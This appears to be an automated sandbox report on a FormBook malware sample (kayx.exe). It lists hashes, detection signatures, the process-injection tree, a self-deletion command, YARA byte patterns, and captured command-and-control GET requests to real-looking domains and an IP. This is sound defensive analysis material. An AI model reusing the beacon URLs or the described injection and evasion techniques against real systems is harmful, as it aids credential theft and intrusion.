Analysis Report kayx.exe

Overview

General Information

Sample Name: kayx.exe
Analysis ID: 321226
MD5: a80e73a824b655491f54278b7a29467d
SHA1: f33ddffc223c9afa4e226d3567b990a8e44828e6
SHA256: bdcd13abdded8f4f709fb288fb78b4afff486854b3ea78ad378d11220a31c3c4
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • kayx.exe (PID: 6524 cmdline: 'C:\Users\user\Desktop\kayx.exe' MD5: A80E73A824B655491F54278B7A29467D)
    • kayx.exe (PID: 6932 cmdline: C:\Users\user\Desktop\kayx.exe MD5: A80E73A824B655491F54278B7A29467D)
    • kayx.exe (PID: 6916 cmdline: C:\Users\user\Desktop\kayx.exe MD5: A80E73A824B655491F54278B7A29467D)
    • kayx.exe (PID: 6900 cmdline: C:\Users\user\Desktop\kayx.exe MD5: A80E73A824B655491F54278B7A29467D)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • firefoxe.exe (PID: 3032 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe' MD5: A80E73A824B655491F54278B7A29467D)
        • firefoxe.exe (PID: 2128 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe' MD5: A80E73A824B655491F54278B7A29467D)
        • mstsc.exe (PID: 6072 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: 2412003BE253A515C620CE4890F3D8F3)
          • cmd.exe (PID: 4816 cmdline: /c del 'C:\Users\user\Desktop\kayx.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 1632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x83c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x916a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9ee2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19157:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a1ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x16079:$sqlite3step: 68 34 1C 7B E1
    • 0x1618c:$sqlite3step: 68 34 1C 7B E1
    • 0x160a8:$sqlite3text: 68 38 2A 90 C5
    • 0x161cd:$sqlite3text: 68 38 2A 90 C5
    • 0x160bb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x161e3:$sqlite3blob: 68 53 D8 7F 8C
    00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x83c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8762:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14075:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x13b61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14177:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x142ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x916a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x12ddc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x9ee2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19157:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a1ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      17.2.kayx.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        17.2.kayx.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x75c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7962:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13275:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x12d61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13377:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x134ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x836a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x11fdc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x90e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18357:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x193ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        17.2.kayx.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x15279:$sqlite3step: 68 34 1C 7B E1
        • 0x1538c:$sqlite3step: 68 34 1C 7B E1
        • 0x152a8:$sqlite3text: 68 38 2A 90 C5
        • 0x153cd:$sqlite3text: 68 38 2A 90 C5
        • 0x152bb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x153e3:$sqlite3blob: 68 53 D8 7F 8C
        17.1.kayx.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
          17.1.kayx.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x75c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7962:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13275:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x12d61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13377:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x134ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x836a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x11fdc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x90e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18357:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x193ca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          AV Detection:

          Antivirus / Scanner detection for submitted sample
          Source: kayx.exe, Avira: detected
          Antivirus detection for dropped file
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe, Avira: detection malicious, Label: TR/Dropper.MSIL.blecg
          Multi AV Scanner detection for dropped file
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe, ReversingLabs: Detection: 45%
          Multi AV Scanner detection for submitted file
          Source: kayx.exe, Virustotal: Detection: 34%
          Source: kayx.exe, ReversingLabs: Detection: 45%
          Yara detected FormBook
          Source: Yara match, File source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped file
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe, Joe Sandbox ML: detected
          Machine Learning detection for sample
          Source: kayx.exe, Joe Sandbox ML: detected
          Source: 17.2.kayx.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 17.1.kayx.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe, File opened: C:\Users\user\AppData\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe, File opened: C:\Users\user\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe, File opened: C:\Users\user\AppData\Roaming\Microsoft\
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 4x nop then pop edi, 17_2_0040C122
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 4x nop then pop edi, 17_1_0040C122
          Source: global traffic, HTTP traffic detected: GET /bg8v/?dR-0T=Hsg8WmNsaLMOQIlEIMfuFbk4MqbSZJWeSLNd01xx1olwbrd2uyfvFyB8JS14b3uA3WpV&Fxl0dR=KdShEXiX HTTP/1.1 Host: www.ghoster.agency Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic, HTTP traffic detected: GET /bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jb1&Fxl0dR=KdShEXiX HTTP/1.1 Host: www.jibenentreprenad.mobi Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox View, IP Address: 184.168.131.241
          Source: Joe Sandbox View, ASN Name: AS-26496-GO-DADDY-COM-LLCUS
          Source: unknown, DNS traffic detected: queries for: www.ghoster.agency
          Source: mstsc.exe, 00000015.00000002.487573696.000000000543D000.00000004.00000001.sdmp, String found in binary or memory: https://www.jiben.se/bg8v/?dR-0T=BcRzG6gD98FnRJnM8S7gZqeq6OFb5sR0iVW6Pm7cF5yWostREqJtYuV2Juo62Dzc0Jb
          Source: firefoxe.exe, 00000013.00000002.483426018.000000000108B000.00000004.00000020.sdmp, Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match, File source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORY, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORY, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 1_2_05C4AAF0 NtUnmapViewOfSection,1_2_05C4AAF0
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 1_2_05C4AAE8 NtUnmapViewOfSection,1_2_05C4AAE8
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00417B90 NtCreateFile,17_2_00417B90
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00417C40 NtReadFile,17_2_00417C40
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00417CC0 NtClose,17_2_00417CC0
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00417D70 NtAllocateVirtualMemory,17_2_00417D70
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00417B4A NtCreateFile,17_2_00417B4A
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00417BE2 NtCreateFile,17_2_00417BE2
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00417B8A NtCreateFile,17_2_00417B8A
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00417CBF NtClose,17_2_00417CBF
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00E498F0 NtReadVirtualMemory,LdrInitializeThunk,17_2_00E498F0
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00E49860 NtQuerySystemInformation,LdrInitializeThunk,17_2_00E49860
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00E49840 NtDelayExecution,LdrInitializeThunk,17_2_00E49840
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00E499A0 NtCreateSection,LdrInitializeThunk,17_2_00E499A0
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00E49910 NtAdjustPrivilegesToken,LdrInitializeThunk,17_2_00E49910
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00E49A50 NtCreateFile,LdrInitializeThunk,17_2_00E49A50
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00E49A20 NtResumeThread,LdrInitializeThunk,17_2_00E49A20
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00E49A00 NtProtectVirtualMemory,LdrInitializeThunk,17_2_00E49A00
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00E495D0 NtClose,LdrInitializeThunk,17_2_00E495D0
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00E49540 NtReadFile,LdrInitializeThunk,17_2_00E49540
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00E496E0 NtFreeVirtualMemory,LdrInitializeThunk,17_2_00E496E0
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00E49660 NtAllocateVirtualMemory,LdrInitializeThunk,17_2_00E49660
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00E49FE0 NtCreateMutant,LdrInitializeThunk,17_2_00E49FE0
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00E497A0 NtUnmapViewOfSection,LdrInitializeThunk,17_2_00E497A0
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00E49780 NtMapViewOfSection,LdrInitializeThunk,17_2_00E49780
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00E49710 NtQueryInformationToken,LdrInitializeThunk,17_2_00E49710
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00E498A0 NtWriteVirtualMemory,17_2_00E498A0
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00E4B040 NtSuspendThread,17_2_00E4B040
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00E49820 NtEnumerateKey,17_2_00E49820
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00E499D0 NtCreateProcessEx,17_2_00E499D0
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00E49950 NtQueueApcThread,17_2_00E49950
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00E49A80 NtOpenDirectoryObject,17_2_00E49A80
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00E49A10 NtQuerySection,17_2_00E49A10
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00E4A3B0 NtGetContextThread,17_2_00E4A3B0
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00E49B00 NtSetValueKey,17_2_00E49B00
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00E495F0 NtQueryInformationFile,17_2_00E495F0
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00E49560 NtWriteFile,17_2_00E49560
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00E49520 NtWaitForSingleObject,17_2_00E49520
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00E4AD30 NtSetContextThread,17_2_00E4AD30
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00E496D0 NtCreateKey,17_2_00E496D0
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00E49670 NtQueryInformationProcess,17_2_00E49670
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00E49650 NtQueryValueKey,17_2_00E49650
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00E49610 NtEnumerateValueKey,17_2_00E49610
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00E49760 NtOpenProcess,17_2_00E49760
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00E49770 NtSetInformationFile,17_2_00E49770
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00E4A770 NtOpenThread,17_2_00E4A770
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00E49730 NtQueryVirtualMemory,17_2_00E49730
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_2_00E4A710 NtOpenProcessToken,17_2_00E4A710
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_1_00417B90 NtCreateFile,17_1_00417B90
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_1_00417C40 NtReadFile,17_1_00417C40
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_1_00417CC0 NtClose,17_1_00417CC0
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_1_00417D70 NtAllocateVirtualMemory,17_1_00417D70
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_1_00417B4A NtCreateFile,17_1_00417B4A
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_1_00417BE2 NtCreateFile,17_1_00417BE2
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_1_00417B8A NtCreateFile,17_1_00417B8A
          Source: C:\Users\user\Desktop\kayx.exe, Code function: 17_1_00417CBF NtClose,17_1_00417CBF
          Source: C:\Users\user\Desktop\kayx.exeCode function: String function: 00419A40 appears 38 times
          Source: C:\Users\user\Desktop\kayx.exeCode function: String function: 00E0B150 appears 54 times
          Source: kayx.exe, 00000001.00000002.355661594.00000000059B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs kayx.exe
          Source: kayx.exe, 00000001.00000002.351671330.0000000000F28000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameVdltohs3.exel% vs kayx.exe
          Source: kayx.exe, 00000001.00000002.352304174.000000000333A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameClassLibrary3.dll< vs kayx.exe
          Source: kayx.exe, 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameKlghppetippu.dll4 vs kayx.exe
          Source: kayx.exe, 0000000F.00000002.349503948.0000000000268000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameVdltohs3.exel% vs kayx.exe
          Source: kayx.exe, 00000010.00000002.350319835.0000000000328000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameVdltohs3.exel% vs kayx.exe
          Source: kayx.exe, 00000011.00000002.397054523.000000000108F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs kayx.exe
          Source: kayx.exe, 00000011.00000000.350990783.0000000000468000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameVdltohs3.exel% vs kayx.exe
          Source: kayx.exe, 00000011.00000002.397835707.0000000002C23000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemstsc.exej% vs kayx.exe
          Source: kayx.exeBinary or memory string: OriginalFilenameVdltohs3.exel% vs kayx.exe
          Source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
